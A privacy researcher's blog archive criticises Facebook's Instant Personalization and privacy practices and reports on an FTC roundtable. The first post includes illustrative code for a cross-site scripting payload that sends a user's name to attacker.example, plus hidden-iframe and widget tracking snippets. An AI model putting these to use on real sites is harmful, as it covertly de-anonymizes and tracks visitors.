Posts tagged ‘facebook’

Facebook’s Instant Personalization: An Analysis of Fundamental Privacy Flaws

Facebook has begun to accelerate the web-wide roll-out of the Instant Personalization program. The number of partner websites recently jumped from three to five, and a partnership with the early-stage venture firm YCombinator is set to greatly expand that number in the coming months.[1]

Instant Personalization allows a partner website to automatically learn the identity of a visitor (as well as some data about them) without any explicit user action, provided that the visitor is a logged-in Facebook user. It is probably the most privacy-intrusive change introduced by the company this year, and could lead to a profound change in how the web works and is perceived.

Facebook’s superficially reassuring line is that only data that is already public is shared with partner sites. Even setting aside the fact that it is hard, and getting harder, for users to figure out exactly what data is public, I find the official explanation to be a red herring. In this article I will examine the various fundamental flaws of Instant Personalization.

1. Sneakiness. All the information transmitted via Instant Personalization is already available via Facebook Connect; the sole purpose of Instant Personalization is to eliminate the element of user authorization from the process. Thus, I find its very raison d’être questionable. If a user declines to use Facebook Connect, perhaps they have a good reason for doing so. Think about a porn site — I don’t think I need to elaborate.

2. Identity. To me, what is much more worrisome than third parties getting your data is third parties getting your identity when you browse. The idea that a website knows who you are as soon as you land on it is inherently creepy because it violates users’ mental model of how the web works. The cumulative effect is worse — people are intensely uncomfortable when they feel they are being “followed around” as they browse the web.

From a technical perspective, an Instant Personalization partner could itself turn around and become an Instant Personalization provider, and so could any website that this partner provided Instant Personalization services for, ad infinitum. This is because any number of tracking devices (invisible iframes) can be nested within a page.
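To make this concrete, here is a minimal sketch, in TypeScript, of how a partner page could pass a visitor’s identity one level down via an invisible iframe. The domain name, query parameter and function are hypothetical (the actual Instant Personalization protocol is not public), but the nesting trick requires nothing more than this:

```typescript
// Runs on a hypothetical partner site that has already learned the
// visitor's identity via Instant Personalization.
function forwardIdentity(userId: string): void {
  const iframe = document.createElement("iframe");
  // The nested site now learns the visitor's identity without any
  // user action, just as the partner itself did.
  iframe.src =
    "https://sub-partner.example/ip?uid=" + encodeURIComponent(userId);
  iframe.style.display = "none"; // invisible to the user
  document.body.appendChild(iframe);
}
```

The nested site can repeat the trick with an iframe of its own, which is why the chain can continue indefinitely.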

Implementation bugs on partner sites also have the effect of leaking your identity to other parties. In my ubercookies series, I documented a series of bugs that can be exploited by an arbitrary website to learn the visitor’s identity. All of these apply to Instant Personalization: if any one of the partner websites has such a bug, an arbitrary attacker can exploit it to instantly de-anonymize visitors to their own site. Security researcher theharmonyguy has a great post on cross-site scripting vulnerabilities on both Rotten Tomatoes and Scribd that compromise Instant Personalization in this fashion.[2]
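As a schematic illustration of why cross-site scripting is fatal here: script injected into any page on a partner site runs with that page’s privileges, so it can read whatever the page was personalized with and ship it elsewhere. The selector and URL below are invented for the example:

```typescript
// Hypothetical XSS payload injected into a partner site's page.
// The page greets the logged-in Facebook user by name, so the
// injected script can simply read the greeting out of the DOM...
const greeting =
  document.querySelector("#welcome-banner")?.textContent ?? "";
// ...and exfiltrate it to the attacker with a throwaway image request.
new Image().src =
  "https://attacker.example/log?d=" + encodeURIComponent(greeting);
```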

3. Facebook gets your clickstream. Instant Personalization is a two-way street: while the partner site gets access to the user’s identity, Facebook learns the URLs of the pages the user visits. In a world where Instant Personalization is widely deployed, Facebook will be able to monitor a large fraction, perhaps the majority, of the clicks you make around the web.

While troubling, this is not unprecedented: the Facebook like button poses a very similar privacy problem — Facebook sees you whenever you visit any page with the like button (or another social plugin) installed, even if you never click it.[3] Facebook bowed to pressure from privacy advocates and agreed to delete the logs from social plugins after 90 days; I would like to see the same policy applied to Instant Personalization logs as well.

4. Third parties could get your clickstream. Normally, an Instant Personalization partner can only see your clicks on their own site. However, think of an Instant Personalization partner whose product is a social widget or an analytics plugin that is intended to be installed on many client sites. From a technical perspective, loading a page or widget in an iframe is not fundamentally different from visiting the site directly. That means it is feasible for an Instant Personalization partner with a social widget to monitor your clicks — tied to your real identity, of course — on all sites with the widget installed.[4]
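Here is a sketch of what such a widget’s client-side script might look like (the partner domain and endpoint are hypothetical; this illustrates the mechanism rather than any particular partner’s code):

```typescript
// Hypothetical widget script, served from the partner's domain inside
// an iframe embedded on many unrelated client sites.
(function reportPageView(): void {
  // Inside the iframe, document.referrer is the URL of the host page.
  const hostPage = document.referrer;
  // The request goes to the partner's own domain with its cookies
  // attached, so the identity the partner learned through Instant
  // Personalization rides along with every page view.
  fetch(
    "https://widget-partner.example/track?page=" +
      encodeURIComponent(hostPage),
    { credentials: "include" }
  );
})();
```

From the partner’s server logs, this yields exactly the identity-linked clickstream described above.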

5. Lack of enforcement. So far I have described the lack of technological barriers to various types of misuse and abuse of Instant Personalization. However, Facebook contractually prohibits partners from misusing the data. The natural question is whether this is effective.

It is too early to tell, because there are currently only five partners. To predict how things will turn out once numerous startups — without the resources or the incentive for security testing and privacy compliance — get on board, we can look to the track record of Facebook’s third-party application platform. As you may recall, that track record has been rather poor, with enforcement of Terms of Service violations haphazard at best.

Mitigation. In my opinion these flaws are inherent, and I don’t think Instant Personalization will turn out well from a security and privacy perspective. User expectations are not malleable, cross-site scripting bugs will always exist, there will soon be too many partner sites to monitor closely, and some of them will look for ways to push the boundaries of what they can do.

However, there are two things Facebook can do to mitigate the extent of the damage. The first is to make public both the technical specification and the Terms of Use of the Instant Personalization program, so that there can be some independent monitoring of bugs and policy violations. The second is to commit resources to ToS enforcement — Facebook needs to signal that their enforcement efforts have some teeth, and that there will be penalties for partners with buggy sites or noncompliant data use practices.

Footnotes.
[1] YCombinator-funded companies will get “priority access” to various Facebook technologies including “Facebook Credits, Instant Personalization and upcoming beta features”. Interestingly, Instant Personalization seems to be the feature that YCombinator is most interested in.

[2] Yelp.com was also found vulnerable to a cross-site scripting bug soon after Instant Personalization launched. This means the majority of partner sites — 3 out of 5 — have had vulnerabilities that compromise Instant Personalization.

[3] In Instant Personalization, Facebook and the partner site communicate invisibly in the background each time the user visits a page on the partner site; in this way the mechanism is different from social widgets.

[4] Large-scale clickstream data is prone to misuse in various ways: government coercion, hacking, or being purchased as part of bankruptcy settlements (especially when we’re talking about startups).

Thanks to Kevin Bankston for pointing me to Facebook’s log retention policy for social plugins.

To stay on top of future posts, subscribe to the RSS feed or follow me on Twitter.

September 28, 2010 at 3:21 pm 6 comments

Facebook, Privacy, Public Opinion and Pitchforks

As just about everyone is already aware, Facebook has been up to a bunch of Big Brotherly stuff lately, including “instant personalization” (making your identity and data available to third-party sites you visit), arguing that ToS violations should be treated as criminal violations, and forcing you to make your “interests” public (or delete them). Overall, it looks like they’re making a bold move to take control of everyone’s identity and connections, privacy be damned.

The entirely predictable effect of this has been that everything the company now does is being viewed with extreme suspicion. The pitchforks have been sharpened, and the mob gets set off on almost any excuse. In the last week, one somewhat questionable feature, one minor bug and one utter non-event have each been reported as sinister privacy disasters:
  1. The questionable feature was linking your statuses to “Connections” pages. The outrage was based on the meme “if your status contains the word FBI then the FBI will have a record of it,” which appears to have started here. That article is full of hyperbole, and it understandably appears to have been widely misread as claiming that even private statuses appear on Connections pages (they don’t). There’s really nothing new in terms of the visibility of your statuses: Facebook already had real-time search for public statuses, and the only difference is that someone can now click on the “FBI” page instead of having to type “FBI” into the search box.
  2. The minor bug was that Facebook started listing Connect-enabled websites you visit in the “Applications” tab of your privacy settings. The sites didn’t get your identity or any of your data, nor did they have privileges to post to your wall. The fact that you visited them was not visible to anyone else. No actual harm was done. And yet an article titled “Facebook’s new features secretly add apps to your profile” alleged all of these things without making any real effort to check with Facebook. Facebook quickly fixed the bug and contacted the authors, who updated the story, but that did little to quell the rumors, which took on a life of their own.
  3. The non-issue was Facebook leaking your IP address in email notifications. This is normal behavior: most webmail providers, with the exception of Gmail, put the sender’s IP address into the message headers as a spam-prevention technique. This kicked up another shitstorm.

In spite of these unfair accusations, it is hard for me to feel any sympathy for the beleaguered company. This is how public opinion works, and they can’t claim not to have seen it coming. As this fantastic visualization by Matt McKeon shows, Facebook has been on a long and consistent path to make all of your information public, essentially pulling a giant bait-and-switch on their users. They stepped up the pace recently, asked their users to give up too much too fast, and something just snapped.

I think Facebook underestimated the extent to which privacy correlates with trust. They were forgiven for Beacon and other problems in the past, but after the most recent series of privacy violations, it became clear that these were not missteps but deliberate actions. I believe that Facebook’s relationship with its users has changed fundamentally, and isn’t going to mend any time soon. Perhaps Facebook’s reckoning is that they are now big enough that it doesn’t matter any more. That remains to be seen.

On a personal note, someone pretty high up at Facebook emailed me a couple of months ago (although “not in an official capacity”) to discuss privacy issues with some of their upcoming product launches. Unfortunately I was traveling at the time, and when I got back they were no longer interested. I guess by then it was too close to f8 and all the important decisions had been made. I can’t help wondering if the outcome might have been different had I been able to meet with them — they might have eased off just a little on their world-domination plans and avoided the straw that broke the camel’s back. But I suspect that’s just wishful thinking, given that the imperative for their current push in all likelihood came from the very top.

To stay on top of future posts, subscribe to the RSS feed or follow me on Twitter.

May 10, 2010 at 7:02 pm 5 comments

Privacy is not Access Control (But then what is it?)

In my previous article on the Google Buzz fiasco, I pointed out that the privacy problems were exacerbated by the fact that the user interface was created by programmers. In this post I will elaborate on that theme and provide some constructive advice on privacy-conscious design, especially for social networking.

The problem I’m addressing is that as far as computer scientists and computer programmers are concerned, privacy is a question of access control, i.e., who is allowed to look at what. Unfortunately, in the real world, that is only a tiny part of what privacy is about. Here are three examples to make my point:

1. Dummy cameras. Consider a thought experiment: suppose the government installed a bunch of cameras all over a public park along with prominent signs announcing 24×7 surveillance. The catch, however, is that the cameras have not been turned on. Has anyone’s privacy been violated?

From the computer science perspective, the answer is no, because no one is actually being observed, nothing is being recorded and no data is being generated. But common sense tells us that something is wrong with that answer. The cameras cause people considerable discomfort. The surveillance, real or imaginary, changes their behavior.

This hypothetical scenario is adapted from Ryan Calo’s paper, which analyzes in detail the “sensation of being observed.”

2. Aggregation changes the equation. Remember the uproar when Facebook released News Feed? No new information was revealed to your friends that wasn’t accessible to them before; it was just that the News Feed made it dramatically easier to observe all your activities on the site.

Of course, it goes both ways: the technology in turn changed people’s expectations; it is now hard to imagine not having a feed-like system, whether on Facebook or another social network. Nevertheless, I often see people putting something into their profile, deciding a few moments later that they don’t want to share it after all, and realizing that it is too late because the information has already been broadcast to their friends.

3. Everyone-but-X access control, which I described in an earlier article, shows in a direct way how access control fails to capture privacy requirements. From the traditional CS security perspective, the ability for a user to make something visible to “everyone but X” is meaningless: X can always create a fake account to get around it.

But a use case should immediately convince you that everyone-but-X is a good idea: your sibling is on your friends list and you want to post about your sex life. It’s not that you want to prevent X from having access to your post at all costs, but rather that both of you would prefer that X not see it.
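A minimal sketch, with hypothetical types, of what everyone-but-X looks like in code, and of why it is not access control in the security sense:

```typescript
// Hypothetical data model for everyone-but-X visibility.
interface Post {
  authorId: string;
  body: string;
  excludedViewers: Set<string>; // the "X" in everyone-but-X
}

// Visible to everyone except the explicitly excluded viewers.
// Note what this is NOT: a security guarantee. Nothing stops X from
// creating a fake account whose id is not in the excluded set.
function isVisibleTo(post: Post, viewerId: string): boolean {
  return !post.excludedViewers.has(viewerId);
}
```

The check encodes a social preference rather than a hard guarantee, and that is precisely the point.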

Access control is not the goal of privacy design. It is at best one of many tools. Rather, human behavior is key. The dummy cameras were bad because they affected people’s behavior in a detrimental way. News Feed was bad because it introduced major new privacy consequences for the behaviors that people were accustomed to on the site. (However, I would argue that the dramatic increase in usefulness trumped the privacy drawbacks.) Everyone-but-X privacy is good because it allows people to carry over to the online setting behaviors that they are used to in the real world.

It is impossible to fully analyze the privacy consequences of a design decision without studying its impact on actual user behavior. There is no theoretical framework to ensure that a design decision is safe — user testing is essential. Going back to Google Buzz, a beta period or a more gradually phased roll-out would have undoubtedly been better.

To stay on top of future posts, subscribe to the RSS feed or follow me on Twitter.

February 13, 2010 at 3:03 am 10 comments

In which I come out: Notes from the FTC Privacy Roundtable

I was on a panel at the second FTC privacy roundtable in Berkeley on Thursday. Meeting a new community of people is always a fascinating experience. As a computer scientist, I’m used to showing up to conferences in jeans and a T-shirt; instead I found myself dressing formally and saying things like “oh, not at all, the honor is all mine!”

This post will also be the start of a new direction for this blog. So far, I’ve mostly confined myself to “doing the math” and to factual exposition. That’s going to change, for two reasons:

  • The central theme of this blog and of my Ph.D. dissertation — the failure of data anonymization — now seems to be widely accepted in policy circles. This is due in large part to Paul Ohm’s excellent paper, which is a must-read for anyone interested in this topic. I no longer have to worry about the acceptance of the technical idea being “tainted” by my opinions.
  • I’ve been learning about the various facets of privacy — legal, economic, etc. — for long enough to feel confident in my views. I have something to contribute to the larger discussion of where technological society is heading with respect to privacy.

Underrepresentation of scientists

[Photo caption: Living up to the stereotype]

As it turned out, I was the only academic computer scientist among the 35 panelists. I found this very surprising. The underrepresentation is not because computer scientists have nothing to contribute — after all, there were other CS Ph.D.s there from industry groups like Mozilla. Rather, I believe it is a consequence of the general attitude of academic scientists towards policy issues. Most researchers consider it not worth their time, and a few actively disdain it.

The problem is even deeper: academics have the same disdainful attitude towards the popular exposition of science. The underlying reason is that the goal in academia is to impress one’s peers; making the world better is merely a side-effect, albeit a common one. The incentive structure in academia needs to change. I will pick up this topic in future posts.

The FTC has an admirable approach to regulation

As I found out in the course of the day’s panels, the FTC is not about prescribing or mandating what to do. Pushing a specific privacy-enhancing technology isn’t the kind of thing they are interested in doing at all. Rather, they see their role as getting the market to function better and the industry to self-regulate. The need to avoid harming innovation was repeatedly emphasized, and there was a lot of talk about not throwing the baby out with the bathwater.

The following were the potential (non-baby-hurting) initiatives that were most talked about:

  • Market transparency. Markets can only work well when there is full information, and when it comes to privacy the market has failed horribly. Users have no idea what happens to their data once it’s collected, and no one reads privacy policies. Regulation that promotes transparency can help the market fix itself.
  • Consumer education. This is a counterpart to the previous point. Education about privacy dangers as well as privacy technologies can help.
  • Enforcement. A few bad apples have been responsible for the most egregious privacy SNAFUs. The larger players are by and large self-regulating. The FTC needs to work with law enforcement to punish the offenders.
  • Carrots and sticks. Even the specter of regulation, corporate representatives said, is enough to get the industry to self-regulate. Many would disagree, but I think a carrots-and-sticks approach can be made to work.
  • Incentivizing adoption of PETs (privacy enhancing technologies) in general. The question of how the FTC can spur the adoption of PETs was brought up on almost every panel, but I don’t think there were any halfway convincing answers. Someone mentioned that the government in general could go into the market for PETs, which seems reasonable.

As a libertarian, I think the overall non-interventionist approach here is exactly right. I’m told that the FTC is rather unusual among US regulatory agencies in this regard (which makes sense, considering that the FCC, for example, spends its time protecting children from breasts when it is not making up lists of words.)

Facebook’s two faces

Facebook public policy director Tim Sparapani, who was previously with the ACLU, made a variety of comments on the second panel that were bizarre, to put it mildly. Take a look (my comments are in sub-bullets):

  • “We absolutely compete on privacy.”
    • That’s a weird definition of “compete.” Facebook has a history of rolling out privacy-infringing updates, such as Beacon, the ToS changes, and the recent update that made the social graph public. Then they wait to see if there’s an outcry and roll back some of the changes. It is hard to think of another company that has had such a cavalier approach.
  • “There are absolutely no barriers to entry to create a new social network.”
    • Except for that little thing called the network effect, which is the mother of all barriers to entry. In a later post I will analyze why Facebook has reached a critical level of penetration in most markets, which makes it nearly unassailable as a general-purpose social network.
  • “Our users have learned to trust us.”
    • I don’t even know what to say about this one.
  • “We are a walled garden.”
    • Sparapani is conflating two different senses of “walled garden” here. This was said in response to a statement by the Google rep about Google’s features that let users migrate their data to other services (which I find very commendable). In this sense, Facebook is indeed a walled garden, and doesn’t allow migration, which is a bad thing. But Sparapani said he meant it in the sense that Facebook doesn’t sell user data wholesale to other companies. That sounds like good news, except that third-party app developers end up sharing user data with other entities, because enforcement of the application developer Terms of Service is virtually non-existent.
  • “If you delete the data it’s gone.” (in the context of deleting your account)
    • That might be true in a strict sense, but it is misleading. Deleting all your data is actually impossible to achieve because most pieces of data belong to more than one user. Each of your messages will live on in the other person’s inbox (and it would be improper to delete it from theirs). Similarly, photos in which you appear, which you would probably like gone when you delete your account, still live on in the album of whoever took the picture. The same goes for your pokes, likes and other multi-user interactions. These are the very things that make a social network social.
  • “We now have controls on privacy at the moment you share data. This is an extraordinary innovation and our engineers are really proud of it.”
    • The first part of that statement is true: you can now set the privacy controls on each of your Facebook status messages independently. The second part is downright absurd. It is completely trivial to implement from an engineering perspective (LiveJournal, for instance, has had it for a decade).

There were more absurd statements, but you get the picture. It’s not just the fact that Sparapani’s comments were unhinged from reality that bothers me — the general tone was belligerent and disturbing. I missed a few minutes of the panel, during which he apparently responded to a criticism from Chris Conley of the ACLU by saying “I was at the ACLU longer than you’ve been there.” That is unprofessional, undignified and a non-answer. Amusingly, he claimed that Facebook was “very proud” of various aspects of its privacy track record at least half a dozen times in the course of the panel.

Contrast all this with Mark Zuckerberg’s comments in an interview with Michael Arrington, which can be summed up as “the age of privacy is over.” That article goes on to say that Facebook’s actions caused the shift in social norms (to the extent that they have shifted at all) rather than merely responding to them. Either way, it is unquestionable that Facebook’s actual behavior at present pays no more than lip service to privacy, and Zuckerberg’s statement is a more-or-less honest reflection of that. On the other hand, as I have shown, the company sings a completely different tune when the FTC is listening.

Engaging privacy skeptics

Aside from Facebook’s shenanigans, I feel that there are two groups in the privacy debate who are talking past each other. One side is represented by consumer advocates, and is largely echoed by the official position of the FTC. The other side’s position can be summed up as “yeah, whatever.” When expressed coherently, that position has three tenets (with the caveat that not all privacy skeptics adhere to all three):

  • Users don’t care about privacy any more.
  • Even if they do, privacy is impossible to achieve in the digital age, so get over it.
  • There are no real harms arising from privacy breaches.

[Tweet screenshot, click to embiggen: an illustrative example of a mainstream-media representative who was at the workshop covering it on Twitter through the lens of his preconceived prejudices.]

Privacy scholars never engage with the skeptics, because the skeptical viewpoint appears obviously false to anyone who has done some serious thinking about privacy. However, it is crucial to engage the opponents, because (1) the skeptical view is extremely common, and (2) many of the startups coming out of the valley fall into this group, and they are going to have control over increasing amounts of user data in the years to come.

The “privacy is dead” view was most famously voiced by Scott McNealy. In its extreme form it is easy to argue against: “start streaming yourself live on the Internet 24/7, and then we’ll talk.” (To be sure, a few people did this 10 years ago as a publicity stunt, but it is obvious that the vast majority of people aren’t ready for that level of invasive monitoring and data collection.) But engaging with skeptics isn’t about refutation; it’s about dealing with a different way of thinking and getting the message across to the other side. Unfortunately, real engagement hasn’t really been happening.

I have a double life in academia and the startup world, and I think this puts me in a somewhat unusual position of being able to appreciate both sides of the argument. My own viewpoint is somewhere in the middle; I will expand on this theme in future blog posts.

January 31, 2010 at 3:49 am 13 comments


About 33bits.org

I’m an associate professor of computer science at Princeton. I research (and teach) information privacy and security, and moonlight in technology policy.

This is a blog about my research on breaking data anonymization, and more broadly about information privacy, law and policy.

For an explanation of the blog title and more info, see the About page.
